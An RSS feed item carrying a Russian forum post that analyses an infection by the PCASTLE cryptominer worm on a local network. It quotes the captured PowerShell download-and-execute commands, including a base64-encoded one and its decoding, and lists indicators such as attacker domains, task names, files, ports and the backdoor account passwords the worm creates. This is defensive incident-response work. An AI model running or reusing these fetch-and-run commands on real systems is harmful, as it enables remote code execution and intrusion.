<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0">
	<channel>
		<title>Форум esetnod32.ru [тема: Червь-криптомайнер PS1.PCASTLE]</title>
		<link>http://forum.esetnod32.ru</link>
		<description>Новое в теме Червь-криптомайнер PS1.PCASTLE форума  на сайте Форум esetnod32.ru [forum.esetnod32.ru]</description>
		<language>ru</language>
		<docs>http://backend.userland.com/rss2</docs>
		<pubDate>Sun, 26 Apr 2026 01:57:13 +0300</pubDate>
		<item>
			<title>Червь-криптомайнер PS1.PCASTLE</title>
			<description><![CDATA[<b><a href="http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/">Червь-криптомайнер PS1.PCASTLE</a></b> в форуме <a href="http://forum.esetnod32.ru/forum9/">Полезная информация</a>. <br />
			В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.<br /><br /> &nbsp; &nbsp;<br />====quote====<br />Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE<br /> &nbsp; &nbsp;Имя файла POWERSHELL.EXE<br /> &nbsp; &nbsp;Цифр. подпись Действительна, подписано Microsoft Windows<br /> &nbsp; &nbsp;Оригинальное имя PowerShell.EXE.MUI<br /> &nbsp; &nbsp;Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)<br /> &nbsp; &nbsp;Описание Windows PowerShell<br /> &nbsp; &nbsp;Производитель Microsoft Corporation<br /><br /> &nbsp; &nbsp;Доп. информация на момент обновления списка<br /> &nbsp; &nbsp;pid = 5100 NT AUTHORITY\СИСТЕМА<br /> &nbsp; &nbsp;Процесс создан 08:20:00 [2021.09.14]<br /> &nbsp; &nbsp;Процесс завершен 08:20:01 [2021.09.14]<br /> &nbsp; &nbsp;parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br /> &nbsp; &nbsp;pid = 4724 NT AUTHORITY\СИСТЕМА<br /> &nbsp; &nbsp;Процесс создан 08:20:00 [2021.09.14]<br /> &nbsp; &nbsp;Процесс завершен 08:20:00 [2021.09.14]<br /> &nbsp; &nbsp;parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br /> &nbsp; &nbsp;pid = 5496 NT AUTHORITY\СИСТЕМА<br /> &nbsp; &nbsp;Процесс создан 08:10:00 [2021.09.14]<br /> &nbsp; &nbsp;Процесс завершен 08:10:01 [2021.09.14]<br /> &nbsp; &nbsp;parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE<br />=============<br /><br /><br />после включение записи лога DNS стали известны целевые адреса:<br /><br /> <br />====quote====<br /> &nbsp; T[.]ZER2[.]COM, V[.]Y6H[.]NET<br />=============<br /><br />далее, <B>разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам</B> и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска:<br /><br /><br />====quote====<br />C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString("http://t[.]zer2[.]com/ipc.jsp?h")"<br />=============<br /><br />и<br /><br /><br />====quote====<br />C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBi<WBR/>&shy;AEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcA<WBR/>&shy;KAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBt<WBR/>&shy;AD8AcwBtAGIAJwApAA==<br />=============<br /><br /><img src="https://chklst.ru/uploads/editor/z2/2rl2adkha8u7.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />после декодирования строки:<br /><br /><br />====quote====<br />I&#65529;E&#65529;X&#65529; &#65529;(&#65529;N&#65529;e&#65529;w&#65529;-&#65529;O&#65529;b&#65529;j&#65529;e&#65529;c&#65529;t&#65529; &#65529;N&#65529;e&#65529;t&#65529;.&#65529;W&#65529;e&#65529;b&#65529;C&#65529;l&#65529;i&#65529;e&#65529;n&#65529;t&#65529;)&#65529;.&#65529;d&#65529;o&#65529;w&#65529;n&#65529;l&#65529;o&#65529;a&#65529;d&#65529;s&#65529;t&#65529;r&#65529;i&#65529;n&#65529;g&#65529;(&#65529;'&#65529;h&#65529;t&#65529;t&#65529;p&#65529;:&#65529;/&#65529;/&#65529;v[&#65529;.]&#65529;b&#65529;e&#65529;a&#65529;h&#65529;h[&#65529;.]&#65529;c&#65529;o&#65529;m&#65529;/&#65529;w&#65529;m&#65529;?&#65529;s&#65529;m&#65529;b&#65529;'&#65529;)&#65529;<br />=============<br /><br />собственно, именно данный целевой адрес и детектировал антивирус:<br /><br />====quote====<br />10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B<br />=============<br /><br />родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline<br /><br /><img src="https://chklst.ru/uploads/editor/p9/psquwezo61py.jpg" alt="Пользователь добавил изображение" border="0" /><br /><br />поиск по известному cmdline позволил определить тип (<noindex><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Trojan.PS1.PCASTLE.AF/" target="_blank" rel="nofollow">Trojan.PS1.PCASTLE</a></noindex>) и дополнительные детали вредоносного ПО, который распространился в сети:<br /><br /> &nbsp; &nbsp;The following {Task Name} - {Task to be run} listed should be used in the steps identified below:<br /><br /> <br />====quote====<br /> &nbsp; \\\Rtsa - powershell -nop -ep bypass -e {Base64 Encoded String}<br /> &nbsp; &nbsp;\\\Rtsa - powershell -nop -ep bypass -c ''IEX(New-Object System.Net.WebClient).DownloadString(\\"http[:]//t[.]zer2[.]com/ipc.jsp?h\\")''<br />=============<br /><br />и<br /><br /> &nbsp; &nbsp;"More advanced options" option to include all hidden files and folders in the search result.<br /><br /> <br />====quote====<br /> &nbsp; %Application Data%\sign.txt<br /> &nbsp; &nbsp;%Application Data%\flashplayer.tmp<br /> &nbsp; &nbsp;%User Startup%\run.bat<br /> &nbsp; &nbsp;%User Startup%\FlashPlayer.lnk<br /><br />=============<br /><br />данные файлы были найдены в карантине антивируса:<br /><br /><br />====quote====<br /> &nbsp; &nbsp;7F450F8583BA949317E8FA47E1B745CEC6CE242E.NDF "C:\Users\***\AppData\Roaming\flashplayer.tmp";"C:\Users\****\AppData\Roaming\flashplayer.tmp" "@NAME=PowerShell/TrojanDownloader.Agent.DV@TYPE=Trojan@SUSP=inf" ****** 221 bytes<br /><br /> &nbsp; &nbsp;896C398162D9175E7B6736DE39710ED8385C9DC2.NDF "c:\users\***\appdata\roaming\microsoft\windows\start menu\programs\startup\flashplayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk" "@NAME=LNK/Agent.GY@TYPE=Trojan@SUSP=inf" 774 bytes<br /><br /> &nbsp; &nbsp;A33C1553998CCC0B1FF1F2A91BBB1A53B686AC13.NDF "C:\Windows\System32\Tasks\Rtsa" "@NAME=PowerShell/TrojanDownloader.Agent.CEJ@TYPE=Trojan@SUSP=inf" **** 2066 bytes<br />=============<br /><br /><br />некоторые детали данного червя<br /><br />некоторые детали:<br />URLs used by updated worms for infection<br /><br />http[:]//w.beahh.com/page.html<br />http[:]//v.beahh.com/<br /><br />PowerShell URLs:<br />Note that these are URL fragments, and more information is usually encoded in the query string.<br /><br />http[:]//v.y6h.net/g<br />http[:]//v.bddp.net/v<br />http[:]//v.bddp.net/wm<br /><br />Domains<br />Some domains have many subdomains.<br />For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.<br /><br />*.beahh[.]com<br />*.bddp[.]net<br />v.y6h[.]net<br />*.zer2[.]com<br />Scheduled task names:<br />\Microsoft\Windows\<br /><br /> &nbsp; &nbsp;Task: {36DAD069-B5EB-4EE4-A085-CB9540ED7B30} - \Microsoft\windows\Rass -&gt; Нет файла &lt;==== ВНИМАНИЕ<br /><br /><br />Filenames:<br />%APPDATA%\sign.txt<br />%APPDATA%\flashplayer.tmp<br />%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk<br /><br />Listening ports:<br />65530<br />65531<br />65532<br />65533<br /><br />TCP traffic on ports:<br />This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)<br />65530<br />65531<br />65532<br />65533<br /><br />Firewall rules:<br />DNS (allow TCP port 65531)<br />DNSS2 (allow TCP port 65531)<br />DNS2 (allow TCP port 65532)<br />DNSsql (allow TCP port 65533)<br />DNSd (allow TCP port 65533)<br />DNSS3 (allow TCP port 65533)<br /><br />User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”<br />SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)<br /><br /><br />детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender<br /> <noindex><a href="https://www.bitdefender.com/files/News/CaseStudies/study/280/Bitdefender-WhitePaper-Worm-Cryptominer-Beapy-PCASTLE.pdf" target="_blank" rel="nofollow"><B>здесь</B></a></noindex> <br />
			<i>11.10.2021 13:37:17, santy.</i>]]></description>
			<link>http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/</link>
			<guid>http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/</guid>
			<pubDate>Mon, 11 Oct 2021 13:37:17 +0300</pubDate>
			<category>Полезная информация</category>
		</item>
	</channel>
</rss>
